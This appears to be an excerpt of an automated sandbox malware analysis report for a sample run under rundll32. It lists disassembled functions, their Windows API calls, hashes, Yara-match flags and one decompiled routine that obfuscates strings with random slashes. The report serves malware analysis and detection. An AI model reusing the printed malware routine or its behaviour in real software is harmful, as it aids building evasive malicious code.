                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                          • String ID:
                                          • API String ID: 1352878660-0
                                          • Opcode ID: e2387d6f4ff9f2ddf6766fe8790f140e1b28ac1534822a041d0722acfcf5f175
                                          • Instruction ID: b8d2eb8c79aa4c426992e9aa36e211d223be74e3104c79403b3729c9189d3a39
                                          • Opcode Fuzzy Hash: e2387d6f4ff9f2ddf6766fe8790f140e1b28ac1534822a041d0722acfcf5f175
                                          • Instruction Fuzzy Hash: DF117C71681118BADF20AFA59C89EAF7EADEF05751F104091FA15F20A1D7318E44CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B650C5 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,?,00B51765), ref: 00B650FD
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B65114
                                          • StrChrA.SHLWAPI(00000000,0000002E,?,?,00B51765), ref: 00B6511D
                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00B51765), ref: 00B6513B
                                            • Part of subcall function 00B67DF1: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,00B51765,00000000,00000004,?,00000000,?), ref: 00B67EC9
                                            • Part of subcall function 00B67DF1: VirtualProtect.KERNEL32(?,00000004,?,?,00000000,00B51765,00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844), ref: 00B67EE4
                                            • Part of subcall function 00B67DF1: RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B67F09
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 105881616-0
                                          • Opcode ID: 2c38e34b2eb24348595791917670a6bfd0cadfb12aa5f9e6ca6b36e0483f5dfa
                                          • Instruction ID: e4ee97ff04d68681dd963ed1b44962e8921a9e1ea225343a52943646a6c74f78
                                          • Opcode Fuzzy Hash: 2c38e34b2eb24348595791917670a6bfd0cadfb12aa5f9e6ca6b36e0483f5dfa
                                          • Instruction Fuzzy Hash: F5216274900709EFCB21DF68C848BAEBBF8EF46304F1480A9E505E7250DB78D985DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5414B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5415B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B5417D
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B541A9
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B541BC
                                            • Part of subcall function 00B56C62: strstr.NTDLL ref: 00B56D3A
                                            • Part of subcall function 00B56C62: strstr.NTDLL ref: 00B56D8D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3712611166-0
                                          • Opcode ID: 1bf4897213608e2c060bdd2fc200b017952210e2df621c333506f6411e43c10a
                                          • Instruction ID: b311b47ac35c40d58fe992422fca743c7a9fd23355abfd3fefe44efaaf9e82c3
                                          • Opcode Fuzzy Hash: 1bf4897213608e2c060bdd2fc200b017952210e2df621c333506f6411e43c10a
                                          • Instruction Fuzzy Hash: 75117976100119BFDB11AFA4CC88DDF7FADEF1939AB0040A5F909A7120DB31DE958BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B55788 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B557A3
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B557C7
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5581F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 00B557F0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                          • String ID:
                                          • API String ID: 453107315-0
                                          • Opcode ID: 0121e5b996e216106bb18d31724408470361d03fa1aac5835d9cde85c434aeb7
                                          • Instruction ID: 82132a716d480a5a13557d316376859e5eb490652d1b3c0a53d85593b093c617
                                          • Opcode Fuzzy Hash: 0121e5b996e216106bb18d31724408470361d03fa1aac5835d9cde85c434aeb7
                                          • Instruction Fuzzy Hash: 2E2106B580050CFFCB119F98C8849EEBFF9EB88342F2084A6F805A7210D7319A84DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048972E7 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E048972E7(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x489a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x489a2f0; // 0xd5abf0c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x489a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x048972ef
                                          0x048972f2
                                          0x048972f8
                                          0x04897310
                                          0x04897312
                                          0x04897317
                                          0x04897319
                                          0x0489731c
                                          0x0489731e
                                          0x04897321
                                          0x04897323
                                          0x04897323
                                          0x04897325
                                          0x04897330
                                          0x04897335
                                          0x04897346
                                          0x0489734e
                                          0x04897353
                                          0x04897356
                                          0x04897359
                                          0x0489735b
                                          0x0489735e
                                          0x04897361
                                          0x04897361
                                          0x04897364
                                          0x0489736f
                                          0x04897374
                                          0x0489737e

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,048937CC,00000000,?,?,0489653D,?,052495B0), ref: 048972F2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0489730A
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,048937CC,00000000,?,?,0489653D,?,052495B0), ref: 0489734E
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0489736F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 51185830ca85d99f60aebc3b96cca051ec6b5e4dfc5cf65f8e83641bbe5ea235
                                          • Instruction ID: 269e76342e29ee236f89ba96f0639916666cf84ea7ce768d8cf2d5fb48248003
                                          • Opcode Fuzzy Hash: 51185830ca85d99f60aebc3b96cca051ec6b5e4dfc5cf65f8e83641bbe5ea235
                                          • Instruction Fuzzy Hash: 92110A72A00514AFD7148FA9DC85D9E7BEAEBC4350B090675F504D7240EB759E009790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B65798 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B5A27D,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B657A3
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B657BB
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00B5A27D,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B657FF
                                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 00B65820
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 0c94fd77c856105e94ba89d765724dd5a72b61df7b0af2834f3c96ce21aa3a36
                                          • Instruction ID: e378bfd9d94902aa7f989d8a921f967e130a64acad43dbb1a7db79be793c8dc0
                                          • Opcode Fuzzy Hash: 0c94fd77c856105e94ba89d765724dd5a72b61df7b0af2834f3c96ce21aa3a36
                                          • Instruction Fuzzy Hash: 74112972A00214BFC7108BA9DC88D9EBBEEDBC1361B0402B6F509D7150EB749E00D7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F1D4 Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFix.KERNEL32(00000000), ref: 00B5F214
                                          • memset.NTDLL ref: 00B5F228
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B5F235
                                            • Part of subcall function 00B6D818: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D872
                                            • Part of subcall function 00B6D818: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D890
                                            • Part of subcall function 00B6D818: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B6D8F8
                                          • GlobalUnWire.KERNEL32(00000000), ref: 00B5F260
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                          • String ID:
                                          • API String ID: 3286078456-0
                                          • Opcode ID: fce7cef2339faf4ea76724490af8707723a892c6bf831405e9173dec807b298f
                                          • Instruction ID: ecfb3c3dcb32f7d4ddb27d93a3e0fe783b6cada3100a44ac0fc9ba9a05873cc3
                                          • Opcode Fuzzy Hash: fce7cef2339faf4ea76724490af8707723a892c6bf831405e9173dec807b298f
                                          • Instruction Fuzzy Hash: 46119175A40205ABD720ABB4AC4DBAEBBB8EF58711F0040A9F905E3280EF7089458B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B69649 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,00B55F93,00000000,00000000), ref: 00B69667
                                          • GetLastError.KERNEL32(?,?,?,00B55F93,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,00B52605,?,0000001E), ref: 00B6966F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide
                                          • String ID:
                                          • API String ID: 203985260-0
                                          • Opcode ID: 7ccadbaf60a0096da8606e4afaa94709b06f86c18cd083d8da14cc0ccf5e4181
                                          • Instruction ID: 1ef4f7accd9aca5d72a31f428f0612b7177db2d3977e0e159daa7366e231df59
                                          • Opcode Fuzzy Hash: 7ccadbaf60a0096da8606e4afaa94709b06f86c18cd083d8da14cc0ccf5e4181
                                          • Instruction Fuzzy Hash: A701D472108350BF8320AA669C48C2BBFECEBCA771B110A59F96697280DB348814CA70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5292E Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B52942
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • mbstowcs.NTDLL ref: 00B5295C
                                          • lstrlen.KERNEL32(?), ref: 00B52967
                                          • mbstowcs.NTDLL ref: 00B52981
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                          • String ID:
                                          • API String ID: 1961997177-0
                                          • Opcode ID: 894c294f0e188d1b9f78ab5d436afd15049709bf80df34f88e789875556f59b7
                                          • Instruction ID: 874ac96c4f9e6316c19a594224c1678a4c825db2c5fb062b19d54cf3a58d5311
                                          • Opcode Fuzzy Hash: 894c294f0e188d1b9f78ab5d436afd15049709bf80df34f88e789875556f59b7
                                          • Instruction Fuzzy Hash: A201B532500304B7CB116BA98C46F9FBFEDDF85756F1444A6FA05A7102EB75DA0497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B600A6 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00B70641,?,00000000,00000000), ref: 00B600B9
                                          • lstrlen.KERNEL32(0614C178,?,00B70641,?,00000000,00000000), ref: 00B600DA
                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00B600F2
                                          • lstrcpy.KERNEL32(00000000,0614C178), ref: 00B60104
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 1929783139-0
                                          • Opcode ID: 15862f000a43b9ec385038d45481e733b826c933b93286663e97bbcc36efd9d2
                                          • Instruction ID: 75a3cca20b0d2319d3ddcfc767324a48184ed088b1f6dcc784c2ddd1900cbda0
                                          • Opcode Fuzzy Hash: 15862f000a43b9ec385038d45481e733b826c933b93286663e97bbcc36efd9d2
                                          • Instruction Fuzzy Hash: 39019B76904248FFC711ABA9AC84B5F7BFCEB59301F1440A5FE0AE3241DB349945C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5121A Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B51227
                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00B5124D
                                          • lstrcpy.KERNEL32(00000014,?), ref: 00B51272
                                          • memcpy.NTDLL(?,?,?), ref: 00B5127F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1388643974-0
                                          • Opcode ID: f348b2c172d167030c38664d90e8fa3dacb8ee2d61361c5af900025f0d652b43
                                          • Instruction ID: 1d93acbfd317cd24e48ebbfc77942d7efaa42748a989a20fa9a0a91a357bf451
                                          • Opcode Fuzzy Hash: f348b2c172d167030c38664d90e8fa3dacb8ee2d61361c5af900025f0d652b43
                                          • Instruction Fuzzy Hash: CE11497190020AEFCB21CF58D884A9ABBF8EB48715F10845AF94AD7220C771E944CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B59706 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,748FD3B0,?,76D85520,00B522AF,00000000,?,?,?), ref: 00B5970D
                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 00B59725
                                          • memcpy.NTDLL(0000000C,?,00000001), ref: 00B5973B
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,748FD3B0,0614C304,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B652E8
                                            • Part of subcall function 00B652C3: StrTrimA.SHLWAPI(?,00B74FC4,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B65307
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,?,00B5CE0C,?,00000020,0614C304), ref: 00B65313
                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 00B5976D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3208927540-0
                                          • Opcode ID: 170289b720147d8344340d3a8818e36481dee4d212a8a0c87c7441303cc6102f
                                          • Instruction ID: 99b57c957de41dfc2a37299b58750a10c9d2208d9514e136c757d3eb982e04f4
                                          • Opcode Fuzzy Hash: 170289b720147d8344340d3a8818e36481dee4d212a8a0c87c7441303cc6102f
                                          • Instruction Fuzzy Hash: D401D432610701EBE7211F25ECC4F277BE8EB88712F1044A6FA0ED6191CFA08C499760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B61777 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • RtlInitializeCriticalSection.NTDLL(00B79420), ref: 00B6179B
                                          • RtlInitializeCriticalSection.NTDLL(00B79400), ref: 00B617B1
                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617C2
                                          • GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617F6
                                            • Part of subcall function 00B6C203: GetModuleHandleA.KERNEL32(?,00000001,77D49EB0,00000000,?,?,?,?,00000000,00B617D9), ref: 00B6C21B
                                            • Part of subcall function 00B6C203: LoadLibraryA.KERNEL32(?), ref: 00B6C2BC
                                            • Part of subcall function 00B6C203: FreeLibrary.KERNEL32(00000000), ref: 00B6C2C7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                          • String ID:
                                          • API String ID: 1711133254-0
                                          • Opcode ID: 0fa79c14940f8ecbf7f4089cc9aaee95727282ac1f016bded095bcf226c3f1c7
                                          • Instruction ID: f9f7b6975b5488a3105b13b13c113abc1a4b8b15b3259a5fdde897762a50e911
                                          • Opcode Fuzzy Hash: 0fa79c14940f8ecbf7f4089cc9aaee95727282ac1f016bded095bcf226c3f1c7
                                          • Instruction Fuzzy Hash: EF11ADB2A41201AFDB109FAEAC89A157BF4FB48321B4148BAE50DD7360CF744C81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B53383 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B5338E
                                          • Sleep.KERNEL32(0000000A), ref: 00B53398
                                          • SetEvent.KERNEL32 ref: 00B533EF
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B5340E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                          • String ID:
                                          • API String ID: 1925615494-0
                                          • Opcode ID: c6068be795f44071e1c44410af03a3389608df9961eddd37a441d67d1d53dd49
                                          • Instruction ID: df82f0b7f7e542bdd3229f93abed0e252f7b175952733c5c47ded2b5e4288b5c
                                          • Opcode Fuzzy Hash: c6068be795f44071e1c44410af03a3389608df9961eddd37a441d67d1d53dd49
                                          • Instruction Fuzzy Hash: 92014471644205FBD7109B61AC4EF593BECEB04752F4040A1FA0DDB290DF749A48CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5FAA8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B57C54: lstrlen.KERNEL32(?,?,00000000,00B5FABE), ref: 00B57C59
                                            • Part of subcall function 00B57C54: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B57C6E
                                            • Part of subcall function 00B57C54: wsprintfA.USER32 ref: 00B57C8A
                                            • Part of subcall function 00B57C54: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B57CA6
                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00B5FAD6
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00B5FAE5
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5FAEF
                                          • GetLastError.KERNEL32 ref: 00B5FAF7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4042893638-0
                                          • Opcode ID: 088bee59281b2703548ac6fb290f05857aaaa61889dde056238d35559f5452bd
                                          • Instruction ID: b4f3139753acf84fdc5ff913e3b61d41c4d441c54905bb0203f4bdc954637cca
                                          • Opcode Fuzzy Hash: 088bee59281b2703548ac6fb290f05857aaaa61889dde056238d35559f5452bd
                                          • Instruction Fuzzy Hash: 3FF0A932205214FAD7215B65FC89F6FBFADEF41762F1041A5FA0E96091CB70458886A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5E084 Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(00B79080,00000000), ref: 00B5E090
                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00B5E0AB
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5E0D4
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B5E0F5
                                            • Part of subcall function 00B5608A: SetEvent.KERNEL32(?,?,00B6F846), ref: 00B5609F
                                            • Part of subcall function 00B5608A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B6F846), ref: 00B560BF
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(00000000,?,00B6F846), ref: 00B560C8
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(00000000,?,?,00B6F846), ref: 00B560D2
                                            • Part of subcall function 00B5608A: RtlEnterCriticalSection.NTDLL(?), ref: 00B560DA
                                            • Part of subcall function 00B5608A: RtlLeaveCriticalSection.NTDLL(?), ref: 00B560F2
                                            • Part of subcall function 00B5608A: CloseHandle.KERNEL32(?), ref: 00B5610E
                                            • Part of subcall function 00B5608A: LocalFree.KERNEL32(?), ref: 00B56119
                                            • Part of subcall function 00B5608A: RtlDeleteCriticalSection.NTDLL(?), ref: 00B56123
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                          • String ID:
                                          • API String ID: 1103286547-0
                                          • Opcode ID: 5854422b32073280dd644eef88dcac15afb3ecd2667de4547129e58da82e91dd
                                          • Instruction ID: 961813850c5740eaffc43d8d8e8e60a5aafa1dee7d5b6b111ae5ed33d22c711b
                                          • Opcode Fuzzy Hash: 5854422b32073280dd644eef88dcac15afb3ecd2667de4547129e58da82e91dd
                                          • Instruction Fuzzy Hash: 3DF09C3239021177DA305765AC0EF473EA9EB85762F0504A4FB0DEB2E0CF659C89C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6FE03 Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcatW.KERNEL32(?,?), ref: 00B6FE15
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
